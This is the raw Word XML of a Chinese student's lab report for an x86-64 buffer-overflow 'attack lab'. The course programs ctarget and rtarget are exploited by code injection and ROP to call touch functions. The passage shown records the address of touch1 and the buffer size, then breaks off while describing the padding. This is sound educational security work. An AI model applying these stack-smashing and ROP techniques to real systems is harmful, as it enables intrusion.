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96809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6DC90080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3252988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CC67A0F" wp14:editId="15457063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2A23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34D8517D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9BAFAE7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3F53ED6" wp14:editId="12786C6A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6F99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211E07D7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181F92FB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 w:rsidR="00C4155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缓冲区溢出</w:t>
      </w:r>
      <w:r w:rsidR="00C4155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C4155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 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0E5672CA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57E6D6D" w14:textId="51C4D8E7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B62414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2021211304</w:t>
      </w:r>
      <w:r w:rsidR="00B6241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7E38B15B" w14:textId="4CAD9A9E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B62414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1035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5FF8EA31" w14:textId="3AE3C495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</w:t>
      </w:r>
      <w:r w:rsidR="00B62414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B6241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赵一鸣</w:t>
      </w:r>
      <w:r w:rsidR="00B6241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B62414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6B3D36A2" w14:textId="0D056725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B6241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（国家示范性软件学院）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2665E714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E5EB86B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02D5A5A9" w14:textId="002506D1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9D7DAA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1A2F2C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40612F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9D7DAA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>11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B62414">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7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5940EE21" w14:textId="77777777" w:rsidR="000B7147" w:rsidRDefault="000B7147" w:rsidP="006D304E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AFC4880" w14:textId="77777777" w:rsidR="00E7109D" w:rsidRDefault="006D304E" w:rsidP="006D304E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr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  <w:r w:rsidRPr="00601531">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002162F0">
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="002162F0">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>理解</w:t>
      </w:r>
      <w:r w:rsidRPr="002162F0">
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="005F1CA1">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>语言程序的</w:t>
      </w:r>
      <w:r w:rsidR="005F1CA1">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数调用机制，栈帧的结构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2B761F2F" w14:textId="77777777" w:rsidR="00E7109D" w:rsidRDefault="00E7109D" w:rsidP="006D304E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E7109D">
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E7109D">
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E7109D">
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>理解</w:t>
      </w:r>
      <w:r w:rsidRPr="00E7109D">
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>x86-64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的栈和参数传递机制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9708E4" w14:textId="77777777" w:rsidR="006D304E" w:rsidRPr="00601531" w:rsidRDefault="00E7109D" w:rsidP="006D304E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="006D304E" w:rsidRPr="002162F0">
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006D304E" w:rsidRPr="002162F0">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>初步掌握</w:t>
      </w:r>
      <w:r w:rsidR="005F1CA1" w:rsidRPr="005F1CA1">
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如何</w:t>
      </w:r>
      <w:r w:rsidR="005F1CA1">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编写更加安全的程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，了解</w:t>
      </w:r>
      <w:r w:rsidR="005F1CA1">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编译器和操作系统提供</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的防攻击手段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  <w:r w:rsidR="006D304E" w:rsidRPr="002162F0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="006D304E" w:rsidRPr="002162F0">
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E7109D">
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进一步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>理解</w:t>
      </w:r>
      <w:r w:rsidR="006D304E" w:rsidRPr="00E7109D">
        <w:rPr>
          <w:rStyle w:val="fontstyle11"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>x86-64</w:t>
      </w:r>
      <w:r w:rsidR="006D304E" w:rsidRPr="002162F0">
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>机器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fontstyle21"/>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指令及指令编码</w:t>
      </w:r>
      <w:r w:rsidR="00601531" w:rsidRPr="002162F0"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563D0338" w14:textId="77777777" w:rsidR="006D304E" w:rsidRPr="002162F0" w:rsidRDefault="006D304E" w:rsidP="002162F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  <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002162F0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C41F3A" w14:textId="77777777" w:rsidR="002162F0" w:rsidRDefault="0060153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L</w:t>
      </w:r>
      <w:r w:rsidRPr="002162F0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="002162F0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EEC020" w14:textId="77777777" w:rsidR="002162F0" w:rsidRDefault="007545A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/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Objdump</w:t>
      </w:r>
      <w:r w:rsidRPr="002162F0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>命令反汇编</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494D4D1D" w14:textId="77777777" w:rsidR="00601531" w:rsidRDefault="00601531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GDB调试工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359421EF" w14:textId="77777777" w:rsidR="002162F0" w:rsidRPr="002162F0" w:rsidRDefault="002162F0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。。。。。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE6A3D8" w14:textId="77777777" w:rsidR="00601531" w:rsidRPr="002162F0" w:rsidRDefault="002162F0" w:rsidP="0060153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41285D07" w14:textId="76DCAA38" w:rsidR="00353FA0" w:rsidRDefault="00EA1295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登录bupt</w:t>
      </w:r>
      <w:r w:rsidR="00216EFB"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服务器，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在home目录下可以找到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一个</w:t>
      </w:r>
      <w:r w:rsidR="00353FA0" w:rsidRPr="00353FA0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>target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n</w:t>
      </w:r>
      <w:r w:rsidR="00353FA0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.tar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文件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解压后得到如下文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44859AED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53FA0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>README.txt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54955794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c</w:t>
      </w:r>
      <w:r w:rsidRPr="00353FA0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>target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004DAEAC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53FA0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>rtarget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3F32B129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53FA0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cookie.txt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16C33FF9" w14:textId="77777777" w:rsidR="00353FA0" w:rsidRP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>farm.c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；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B79FFA8" w14:textId="77777777" w:rsidR="00353FA0" w:rsidRDefault="00353FA0" w:rsidP="00353FA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353FA0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hex2raw</w:t>
      </w:r>
      <w:r w:rsidR="008D7D8A"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7251C5D1" w14:textId="77777777" w:rsidR="00601531" w:rsidRPr="002162F0" w:rsidRDefault="00A83AE7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ctarget和rtarget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运行时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>从标准输入读入字符串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，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这两个程序都存在缓冲区溢出漏洞。通过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代码注入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的方法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实现对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ctarget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程序的攻击，共有3关，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="00EA1295">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一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个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特定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字符串，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可成功调用touch1，或touch</w:t>
      </w:r>
      <w:r w:rsidR="00AE6063">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2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，或touch</w:t>
      </w:r>
      <w:r w:rsidR="00AE6063">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3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就通关，并向计分服务器提交得</w:t>
      </w:r>
      <w:r w:rsidR="00AE6063" w:rsidRPr="00AE6063">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>分信息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；通过ROP方法</w:t>
      </w:r>
      <w:r w:rsidR="00AE6063" w:rsidRPr="00AE6063">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实现对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r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target程序的攻击，共有</w:t>
      </w:r>
      <w:r w:rsidR="00AE6063">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2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关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在指定区域找到所需要的小工具，进行拼接完成指定功能，再</w:t>
      </w:r>
      <w:r w:rsidR="00871B5B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>输入一个特定字符串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实现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成功调用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touch</w:t>
      </w:r>
      <w:r w:rsidR="00903DE9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2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或touch</w:t>
      </w:r>
      <w:r w:rsidR="00903DE9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3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就通关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871B5B" w:rsidRPr="00871B5B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>并向计分服务器提交得分信息</w:t>
      </w:r>
      <w:r w:rsidR="00AE6063" w:rsidRPr="00AE6063">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>；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否则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失败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AE6063">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>但不扣分。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因此，本实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需要通过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反汇编和逆向工程对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ctraget和rtarget执行文件进行分析，找到保存返回地址在堆栈中的位置以及所需要的小工具机器码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903DE9" w:rsidRPr="00903DE9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r w:rsidR="00903DE9" w:rsidRPr="00903DE9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2的具体内容见实验2说明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903DE9" w:rsidRPr="00903DE9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>尤其需要认真阅读各阶段的</w:t>
      </w:r>
      <w:r w:rsidR="00903DE9" w:rsidRPr="00903DE9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Some Advice</w:t>
      </w:r>
      <w:r w:rsidR="00903DE9" w:rsidRPr="00903DE9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>提示</w:t>
      </w:r>
      <w:r w:rsidR="00903DE9" w:rsidRPr="00903DE9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461ED172" w14:textId="77777777" w:rsidR="00903DE9" w:rsidRDefault="003D3259" w:rsidP="003D325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2162F0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>本实验</w:t>
      </w:r>
      <w:r w:rsidRPr="002162F0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>包含了</w:t>
      </w:r>
      <w:r w:rsidR="00324BDA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="002162F0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>个阶段（或关卡）</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC4675">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，难度逐级递增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。</w:t>
      </w:r>
      <w:r w:rsidR="00903DE9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>各阶段分数如下所示：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC4675">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2755D942" w14:textId="77777777" w:rsidR="003D3259" w:rsidRPr="00903DE9" w:rsidRDefault="00903DE9" w:rsidP="00903DE9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D2572BB" wp14:editId="30E3DBBA">
            <wp:extent cx="3657600" cy="16020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7"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3657600" cy="1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8076" w14:textId="77777777" w:rsidR="003D3259" w:rsidRPr="00BB66A4" w:rsidRDefault="003D3259" w:rsidP="003D3259">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r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</w:t>
      </w:r>
      <w:r w:rsidR="00BB66A4">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>及实验分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455994A9" w14:textId="4F40643F" w:rsidR="00B62414" w:rsidRDefault="00B62414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准备工作：解压压缩包，建立实验记录文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05785803" w14:textId="3A3DA3C7" w:rsidR="00B62414" w:rsidRDefault="00B62414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1：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D03B208" w14:textId="6482CB70" w:rsidR="00B62414" w:rsidRDefault="00B62414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得到touch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的地址:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B62414">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x00000000004018dd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50954CE3" w14:textId="08C3746A" w:rsidR="00B62414" w:rsidRDefault="00B62414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C76DDF" wp14:editId="012B9829">
            <wp:extent cx="6188710" cy="1630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8E56" w14:textId="2D990C50" w:rsidR="00B62414" w:rsidRDefault="00B62414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test函数的输入部分，得到缓冲区大小：0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637A23C4" w14:textId="2E630425" w:rsidR="00B62414" w:rsidRDefault="00B62414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660D6CE" wp14:editId="5C1D783F">
            <wp:extent cx="4305673" cy="1249788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DC34" w14:textId="6A3C9C4B" w:rsidR="00B62414" w:rsidRDefault="00B62414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那么先以2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体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个0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
